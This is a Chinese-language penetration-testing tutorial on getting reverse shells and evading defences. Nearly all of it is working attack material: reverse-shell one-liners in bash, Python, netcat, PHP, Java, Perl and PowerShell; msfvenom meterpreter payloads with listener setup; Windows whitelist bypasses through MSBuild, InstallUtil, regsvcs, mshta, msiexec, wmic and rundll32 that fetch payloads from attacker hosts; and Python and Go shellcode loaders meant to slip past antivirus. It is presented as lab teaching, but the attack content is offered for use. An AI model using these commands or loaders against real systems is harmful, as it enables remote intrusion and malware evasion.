渗透测试中弹shell的多种方式及bypass
字数 1195 2025-08-26 22:11:34
渗透测试中反弹Shell的多种方式及Bypass技术详解
正向连接与反向连接基础概念
正向连接:攻击机主动连接目标机器(如SSH、RDP)
- 适用场景:目标机器有公网IP且端口开放
反向连接:目标机器主动连接攻击机
- 更常用的原因:
- 目标机器处于局域网内
- 目标机器使用动态IP
- 目标机器存在防火墙限制
实验环境配置
- 攻击机:Kali Linux (172.16.1.130)
- 受害机:CentOS 7 (172.16.1.134) / Windows 7 (172.16.1.135)
常见反弹Shell方式
1. Bash反弹
基础方式:
bash -i >& /dev/tcp/172.16.1.130/4444 0>&1
进阶方式:
exec 5<>/dev/tcp/172.16.1.130/4444; cat <&5 | while read line; do $line 2>&5 >&5; done
2. Python反弹
Linux反向连接:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
3. Netcat反弹
条件:目标机器有nc且支持-e参数
nc 172.16.1.130 4444 -t -e /bin/bash
4. PHP反弹
命令行方式:
php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
5. Java反弹
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
6. Perl反弹
perl -e 'use Socket;$i="172.16.1.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
7. PowerShell反弹
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444
8. MSFVenom生成Payload
生成Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.130 LPORT=4444 -f exe > shell.exe
MSF监听:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.1.130
set LPORT 4444
set ExitOnSession false
exploit -j -z
Windows白名单Bypass技术
1. MSBuild利用
原理:利用微软签名的MSBuild.exe执行C#代码
步骤:
- 生成x64 shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp
-
执行:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\path\to\exec.xml"
2. InstallUtil.exe利用
步骤:
- 生成C# shellcode:
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp
- 编译:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:InstallUtil-shell.exe InstallUtil-ShellCode.cs
- 执行:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtil-shell.exe
3. Regasm/Regsvcs利用
步骤:
- 生成shellcode并编译为DLL:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs
- 执行:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 1.dll
或
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U 1.dll
4. Mshta利用
步骤:
- 生成base64编码的shellcode:
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 --f raw > shellcode.bin
cat shellcode.bin | base64 --w 0
-
使用CACTUSTORCH模板
-
执行:
mshta.exe http://attacker.com/shellcode.hta
5. Msiexec利用
步骤:
- 生成MSI格式payload:
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 --f msi > shellcode.txt
- 执行:
msiexec.exe /q /i http://172.16.1.130/shellcode.txt
6. Wmic利用
POC:
wmic os get /FORMAT:"http://example.com/evil.xsl"
evil.xsl示例:
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text" />
<ms:script implements-prefix="user" language="JScript">
<![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]>
</ms:script>
</stylesheet>
7. Rundll32利用
方式一:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
方式二:
rundll32.exe shell32.dll,Control_RunDLL C:\path\to\payload.dll
Payload分离免杀技术
1. Shellcode Loader
- 生成shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c
- 执行:
shellcode_launcher.exe -i test.c
2. 使用偏僻语言
Python + PyInstaller
Python模板:
#!/usr/bin/env python
# encoding:utf-8
import ctypes
def execute():
# 替换为你的shellcode
shellcode = bytearray("\xbe\x24\x6e\x0c\x71\xda...")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
if __name__ == "__main__":
execute()
编译:
pyinstaller.py -F --console payload.py
Go语言 + UPX压缩
Go模板:
package main
import "C"
import "unsafe"
func main() {
buf := ""
buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
// ... shellcode ...
shellcode := []byte(buf)
C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}
编译:
go build -ldflags="-s -w" payload.go
upx payload.exe
总结与实战建议
-
选择合适的方法:
- Linux环境优先考虑bash/python
- Windows环境根据实际情况选择白名单方式
-
免杀要点:
- 尽量使用白名单程序
- 考虑payload分离
- 使用不常见的语言实现
-
实战注意事项:
- 根据目标环境选择最简方式
- 复杂的Bypass可能不如简单的反弹有效
- 注意权限和防火墙规则
-
其他可用技术:
- compiler.exe
- odbcconf
- psexec
- ftp.exe等
-
参考资源:
- Micro8系列
- 三好学生师傅的GitHub项目
- 离别歌师傅的Python后门技术